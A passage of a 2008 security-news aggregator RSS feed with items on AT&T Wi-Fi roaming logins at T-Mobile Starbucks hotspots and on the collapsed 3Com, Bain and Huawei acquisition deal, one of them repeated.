      <content:encoded><![CDATA[<p><strong>T-Mobile's roaming deal with AT&T has obviously already kicked in:</strong> Astute reader Klaus Ernst let me know several days ago that the New York Starbucks locations were offering an AT&T login on the gateway page. I lackadaisically tried this out yesterday here in Seattle. AT&T has a ton of roaming partners, so it presents an interface that lets you type in whatever your particular credentials are to gain access. With my Boingo Wireless account, I have easy access to Starbucks now. The screen below was captured on my iPhone at a Starbucks in Fremont, Seattle (otherwise known as the center of the universe).</p>

<p><img src="http://wifinetnews.com//images/2008/att_tmobile_login.jpg" alt="att_tmobile_login.jpg" border="0" width="264" height="467" /></p>]]></content:encoded>
      <pubDate>Thu, 10 Apr 2008 06:28:37 +0000</pubDate>
      <category domain="http://securityratty.com/tag/york starbucks locations">york starbucks locations</category>
      <category domain="http://securityratty.com/tag/starbucks">starbucks</category>
      <category domain="http://securityratty.com/tag/att">att</category>
      <category domain="http://securityratty.com/tag/att login">att login</category>
      <category domain="http://securityratty.com/tag/boingo wireless account">boingo wireless account</category>
      <category domain="http://securityratty.com/tag/days ago">days ago</category>
      <category domain="http://securityratty.com/tag/t-mobile">t-mobile</category>
      <category domain="http://securityratty.com/tag/easy access">easy access</category>
      <category domain="http://securityratty.com/tag/gain access">gain access</category>
      <source url="http://wifinetnews.com/archives/008269.html">Access AT&amp;T Wi-Fi from T-Mobile Hotspots</source>
    </item>
    <item>
      <title><![CDATA[Is the 3Com, Bain, Huawei deal dead for good?]]></title>
      <link>http://securityratty.com/article/cf310530548f85b127b52e714972ab60</link>
      <guid>http://securityratty.com/article/cf310530548f85b127b52e714972ab60</guid>
      <description><![CDATA[Saw a couple of reports today including this one in the NY Times that the Bain, 3Com, Huawei deal is dead again. Of course we have heard this before, only to see the parties try to figure something...]]></description>
      <content:encoded><![CDATA[
<div xmlns="http://www.w3.org/1999/xhtml"><p>Saw a couple of reports today including this <a href="http://www.nytimes.com/2008/03/21/technology/21com.html?_r=2&amp;ex=1363838400&amp;en=054cff81b96bf45a&amp;ei=5089&amp;partner=rssyahoo&amp;emc=rss&amp;oref=slogin&amp;oref=slogin" target="_blank">one in the NY Times</a> that the Bain, 3Com, Huawei deal is dead again.&nbsp; Of course we have heard this before, only to see the parties try to figure something else out.&nbsp; But this time it sounds like Bain is done wasting cycles on this deal and going to move on.&nbsp; 3Com's stock took a dive on the news.&nbsp; </p>

<p>I personally think that if they were going to divest the Tipping Point stuff, what was the big deal with this one. Instead now 3Com has a much narrower potential universe of partners/acquirers to deal with.&nbsp; It materially decreases the worth of their company and their ability to compete.&nbsp; Looks like Cisco is the winner here.&nbsp; I wonder what there position on this was?</p>

<p><strong>Update:</strong> Now comes a <a href="http://www.xconomy.com/2008/03/21/3com-wants-penalty-from-bain-for-abandoned-takeover-deal/" target="_blank">report</a> that 3Com is demanding a 66 million dollar &quot;break up&quot; fee from Bain for withdrawing from the deal for no good reason.&nbsp; I don't know but the government not letting the deal go through seems like a good reason to me.&nbsp; However, deals like this often have a break up fee clause.&nbsp; Guess we will have to see how this one turns out.</p></div>
]]></content:encoded>
      <pubDate>Fri, 21 Mar 2008 06:26:20 +0000</pubDate>
      <category domain="http://securityratty.com/tag/deal">deal</category>
      <category domain="http://securityratty.com/tag/huawei deal">huawei deal</category>
      <category domain="http://securityratty.com/tag/3com">3com</category>
      <category domain="http://securityratty.com/tag/bain">bain</category>
      <category domain="http://securityratty.com/tag/fee clause">fee clause</category>
      <category domain="http://securityratty.com/tag/fee">fee</category>
      <category domain="http://securityratty.com/tag/narrower potential universe">narrower potential universe</category>
      <category domain="http://securityratty.com/tag/million dollar">million dollar</category>
      <category domain="http://securityratty.com/tag/reason">reason</category>
      <source url="http://www.stillsecureafteralltheseyears.com/ashimmy/2008/03/is-the-3com-bai.html">Is the 3Com, Bain, Huawei deal dead for good?</source>
    </item>
    <item>
      <title><![CDATA[Is the 3Com, Bain, Huawei deal dead for good?]]></title>
      <link>http://securityratty.com/article/901f2645d3a36d5db809d9f20bbd7030</link>
      <guid>http://securityratty.com/article/901f2645d3a36d5db809d9f20bbd7030</guid>
      <description><![CDATA[Saw a couple of reports today including this one in the NY Times that the Bain, 3Com, Huawei deal is dead again. Of course we have heard this before, only to see the parties try to figure something...]]></description>
      <content:encoded><![CDATA[
<div xmlns="http://www.w3.org/1999/xhtml"><p>Saw a couple of reports today including this <a href="http://www.nytimes.com/2008/03/21/technology/21com.html?_r=2&amp;ex=1363838400&amp;en=054cff81b96bf45a&amp;ei=5089&amp;partner=rssyahoo&amp;emc=rss&amp;oref=slogin&amp;oref=slogin" target="_blank">one in the NY Times</a> that the Bain, 3Com, Huawei deal is dead again.&nbsp; Of course we have heard this before, only to see the parties try to figure something else out.&nbsp; But this time it sounds like Bain is done wasting cycles on this deal and going to move on.&nbsp; 3Com's stock took a dive on the news.&nbsp; </p>

<p>I personally think that if they were going to divest the Tipping Point stuff, what was the big deal with this one. Instead now 3Com has a much narrower potential universe of partners/acquirers to deal with.&nbsp; It materially decreases the worth of their company and their ability to compete.&nbsp; Looks like Cisco is the winner here.&nbsp; I wonder what there position on this was?</p></div>

<p><a href="http://feeds.feedburner.com/~a/StillsecureAfterAllTheseYears?a=gPDBIk"><img src="http://feeds.feedburner.com/~a/StillsecureAfterAllTheseYears?i=gPDBIk" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=aYOjIqF"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=aYOjIqF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=MkopFmF"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=MkopFmF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=DrGEWqF"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=DrGEWqF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=9z8sFpF"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=9z8sFpF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=g3EbRmf"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=g3EbRmf" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?a=FIYDI9f"><img src="http://feeds.feedburner.com/~f/StillsecureAfterAllTheseYears?i=FIYDI9f" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/StillsecureAfterAllTheseYears/~4/255516159" height="1" width="1"/>]]></content:encoded>
      <pubDate>Fri, 21 Mar 2008 05:26:20 +0000</pubDate>
      <category domain="http://securityratty.com/tag/deal">deal</category>
      <category domain="http://securityratty.com/tag/huawei deal">huawei deal</category>
      <category domain="http://securityratty.com/tag/3com">3com</category>
      <category domain="http://securityratty.com/tag/bain">bain</category>
      <category domain="http://securityratty.com/tag/narrower potential universe">narrower potential universe</category>
      <category domain="http://securityratty.com/tag/dead">dead</category>
      <category domain="http://securityratty.com/tag/figure">figure</category>
      <category domain="http://securityratty.com/tag/move">move</category>
      <category domain="http://securityratty.com/tag/worth">worth</category>
      <source url="http://feeds.feedburner.com/~r/StillsecureAfterAllTheseYears/~3/255516159/is-the-3com-bai.html">Is the 3Com, Bain, Huawei deal dead for good?</source>
    </item>
  </channel>
</rss>
